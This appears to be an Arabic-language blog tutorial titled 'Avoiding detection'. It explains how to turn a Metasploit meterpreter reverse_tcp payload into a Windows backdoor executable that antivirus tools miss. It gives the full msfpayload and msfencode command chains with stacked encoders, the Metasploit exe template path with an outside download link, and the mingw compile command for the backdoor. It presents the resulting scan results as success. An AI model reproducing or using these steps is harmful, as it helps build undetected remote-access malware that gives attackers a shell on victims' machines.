طريقة تشفير البايلود باستخدام تقنية القوالب | Avoiding detection

طريقة تشفير البايلود باستخدام تقنية القوالب | Avoiding detection

كيف حالكم أعضاء وزوار مدونتنا الكرام، ان شاء الله تكونو بألف خير،



درس اليوم هو حول كيفية تشفير بايلود باستخدام قوالب أو templates، الطريقة خفيفة، مفيدة وسهلة على المبتدئين،

المتطلبات:
لكي يعمل الباكدور على بيئة windows، سنحتاج إلى هذا المترجم، gcc-mingw32
لتثبيثه، قم بإدخال هذا الأمر:

كود:
sudo apt-get install gcc-mingw32


القالب المستخدم موجود بهذا المسار:
كود:
/opt/m e tasploit/apps/pro/msf3/data/templates/src/pe/exe


لمن لم يجده، تستطيع تحميله من هنا:
http://www.gulfup.com/?6EKV2F

سنبدأ أولا بإنتاج شيل كود (sh3ll code) مشفر عن طريق الـ Encoders، تابعوا الصورة:




كود:
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8443 R | msfencode -e x86/fnstenv_mov -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 3 > sh3llcode.c


windows/meterpreter/reverse_tcp : هو البايلود المستخدم127.0.0.1 : الآيبي المحلي
8443 : البورت المحليهي صيغة البايلود الناتج raw وتعني خام، سنحتاج أن يكون البايلود بهذه الصيغة حتى يتسنى لنا تشفيره بالـ msfencoders،
x86/fnstenv_mov و x86/shikata_ga_nai هما الـ encoders الذي استخدمت في تشفير البايلود، لاستعراض باقي الـ encoders أدخل هذا الأمر:

كود:
show encoders
العدد 3 هو لعدد مرات التشفير، يقوم بتكرار التشفير 3 مرات، يمكنك تغييره حسب رغبتك،
أخيرا sh3llcode.c هو اسم الملف الناتج، الذي سيحتوي على شيل كود البايلود،

هذا الملف الناتج،


وهذا محتواه،


نقوم بإزالة + ثم ننسخ الشيل كود (ملون باللون البرتقالي) ونلصقه في الـ template ليصبح هكذا:





متغير comment لم أضع فيه أي شيء، يمكنكم أن تضعوا فيه ما تشاؤون،

بعد ذلك نقوم بحفظ الملف ثم ترجمته عن طريق الأمر:
كود:
i586-mingw32msvc-gcc -o Marco.sbou.exe template.c
بحيث أن Marco.sbou.exe هو اسم الباكدور الناتج، و template.c هو اسم القالب،



نتيجة الـ compiling


نتيجة الفحص،





هذا أفضل ما استطعت التوصل إليه لحد الآن، يمكنكم استخدام أكثر من encoder في نفس الوقت مثلا:

كود:
msfpayload  windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8443 R |  msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e  x86/jmp_call_additive -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3  -t raw | msfencode -e x86/shikata_ga_nai -c 3 > sh3llcd.c



التبليغ طبعا شغال:




وصلنا إلى نهاسة الدرس، أرجوا أن ينال رضاكم

-->

Comments
0 Comments

0 التعليقات: